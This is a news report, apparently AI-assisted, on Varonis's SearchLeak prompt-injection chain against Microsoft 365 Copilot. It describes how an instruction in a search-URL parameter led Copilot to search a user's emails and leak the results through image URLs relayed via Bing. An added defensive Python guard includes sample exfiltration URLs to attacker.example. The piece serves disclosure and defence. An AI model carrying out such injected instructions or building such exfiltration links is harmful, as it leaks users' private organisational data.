The attack highlights a persistent security problem for large language model products: AI systems can struggle to separate legitimate user commands from malicious instructions embedded in outside content. That weakness has forced companies such as Microsoft to rely on guardrails meant to limit what AI assistants can do when handling emails, documents, search results, and other user-accessible data.
Copilot includes protections designed to prevent data from being sent to untrusted websites. Those controls include wrapping output in code blocks so browsers treat it as plain text, and limiting which domains Copilot can contact without user approval. Microsoft domains are allowed under those rules, while other sites face restrictions.
Varonis said its researchers found a way around those protections through an exploit chain they named SearchLeak. The method used what the firm called a Parameter-to-Prompt Injection, placing a malicious instruction inside the query parameter of a Microsoft 365 search URL rather than embedding it directly in an email or document.
An attacker could send a target an email containing a crafted Microsoft 365 search link. If the target clicked it, Copilot could be instructed to search the user’s emails, extract sensitive information, and place it inside an image URL.
“The search functionality is exactly what attackers need, because even with limited capabilities, a user with access to critical information is enough,” the researchers wrote Monday. “To exfiltrate the data, an attacker crafts a URL that tells Copilot to ‘Search the user’s emails,’ extract the title, and embed it in an image URL.”
The researchers found that Copilot’s code-block protection did not activate until after the system’s initial response generation. During that earlier stage, raw HTML could briefly render in the browser, allowing an image request to fire before the final output was wrapped as plain text.
To bypass Copilot’s restrictions on image requests to untrusted websites, the exploit used Bing as an intermediary. Because Bing was permitted under Copilot’s content security policy, the request could be routed through Microsoft’s search engine to an attacker-controlled domain.
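The three guardrail ideas described above (wrapping output so the browser treats it as plain text, applying that guard before anything is rendered rather than only to the final response, and allow-listing outbound domains without letting an allowed host act as a relay) can be shown together in a small output guard. The following Python is an added example written for this article; it is not code from Varonis, Microsoft or the Copilot product, and the host names, parameter names and sample token stream are constructed for illustration.

```python
"""Output guard for an LLM assistant whose answers are rendered in a browser.

Added example, not from the original article or from Microsoft/Varonis.
It demonstrates two defences:

 1. Every streamed chunk is escaped and URL-checked before it reaches the
    renderer, so there is no window in which raw image markup can fire a
    request (the timing gap the article describes).
 2. A domain allow-list for outbound requests that also inspects query
    parameters of an allowed host for a nested URL pointing outside the
    allow-list (the "trusted intermediary" relay pattern).

All host names and parameter names below are constructed placeholders.
"""
import html
import re
from urllib.parse import parse_qs, unquote, urlparse

# Hosts the assistant may embed images/links for (constructed for the example).
ALLOWED_HOSTS = {"example-tenant.sharepoint.com", "trusted-search.example"}

# Any http(s) URL, ending at whitespace or a markdown/HTML delimiter.
BARE_URL = re.compile(r"https?://[^\s)'\"<>]+")


def url_is_safe(url: str, depth: int = 0) -> bool:
    """True only if the URL is https, its host is allow-listed, and no URL
    smuggled inside its query string escapes the allow-list."""
    if depth > 3:  # bound recursion on pathological nesting
        return False
    try:
        parsed = urlparse(url)
    except ValueError:
        return False
    # urlparse().hostname ignores userinfo, so "https://good@evil/" -> "evil".
    if parsed.scheme != "https" or (parsed.hostname or "").lower() not in ALLOWED_HOSTS:
        return False
    for values in parse_qs(parsed.query, keep_blank_values=True).values():
        for value in values:
            # parse_qs already decodes once; unquote again for double encoding.
            for nested in BARE_URL.findall(unquote(value)):
                if not url_is_safe(nested, depth + 1):
                    return False
    return True


def guard_chunk(chunk: str) -> tuple[str, list[str]]:
    """Sanitise one piece of model output before rendering.

    Unsafe URLs become a placeholder and are reported; the text is then
    HTML-escaped so no raw <img>/<a> tag reaches the browser, the analogue of
    wrapping output in a code block."""
    blocked: list[str] = []

    def check(match: re.Match) -> str:
        url = match.group(0)
        if url_is_safe(url):
            return url
        blocked.append(url)
        return "[blocked-url]"

    return html.escape(BARE_URL.sub(check, chunk), quote=False), blocked


def guard_stream(chunks) -> tuple[str, list[str]]:
    """Apply guard_chunk to a token stream.

    The trailing partial token of each chunk is held back until the next
    chunk arrives, so a URL split across two chunks is inspected whole."""
    held, out, blocked_all = "", [], []
    for piece in chunks:
        text = held + piece
        cut = max(text.rfind(c) for c in " \n\t")  # -1 if no whitespace yet
        if cut == -1:
            held = text
            continue
        safe, blocked = guard_chunk(text[: cut + 1])
        out.append(safe)
        blocked_all.extend(blocked)
        held = text[cut + 1 :]
    if held:
        safe, blocked = guard_chunk(held)
        out.append(safe)
        blocked_all.extend(blocked)
    return "".join(out), blocked_all


# Constructed sample stream: an allowed-host URL relaying to an outside host,
# a raw <img> tag to an outside host, and a legitimate allowed-host link.
SAMPLE_STREAM = [
    "Here are your results: ![r](https://trusted-search.example/img?",
    "u=https%3A%2F%2Fattacker.example%2Fc.png%3Fd%3Dquarterly-forecast) and ",
    '<img src="https://attacker.example/x.png?d=meeting-notes"> plus ',
    "https://example-tenant.sharepoint.com/doc.docx",
]

if __name__ == "__main__":
    rendered, blocked = guard_stream(SAMPLE_STREAM)
    print(rendered)
    print("blocked:", blocked)
```

The important design choice is that `guard_stream` never emits an unchecked token: holding back the tail of each chunk costs a few characters of latency but closes the gap between "first tokens rendered" and "guard applied". Checking nested URLs in query parameters is what stops an allow-listed host from being used as a hop to somewhere that is not allow-listed.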
Varonis said the risk was especially significant because SearchLeak affected Microsoft’s enterprise environment. “Since SearchLeak targets the Enterprise tier of Microsoft, the blast radius isn’t limited to personal data—it’s able to surface anything the user has access to inside the organization including emails, meeting invites and notes, SharePoint documents, OneDrive files, and other indexed business content. Depending on how M365 is connected to the environment, the blast radius could extend even wider,” the researchers wrote.
Microsoft fixed the vulnerability last Tuesday. Still, the case underscores how difficult it remains to secure AI assistants that operate across private data, web content, and user workflows. Without a reliable way to prevent malicious instructions from being treated as valid commands, companies may continue to rely on layered safeguards that attackers will keep trying to bypass.
This analysis is based on reporting from Ars Technica.
Image courtesy of Varonis.
This article was generated with AI assistance and reviewed for accuracy and quality.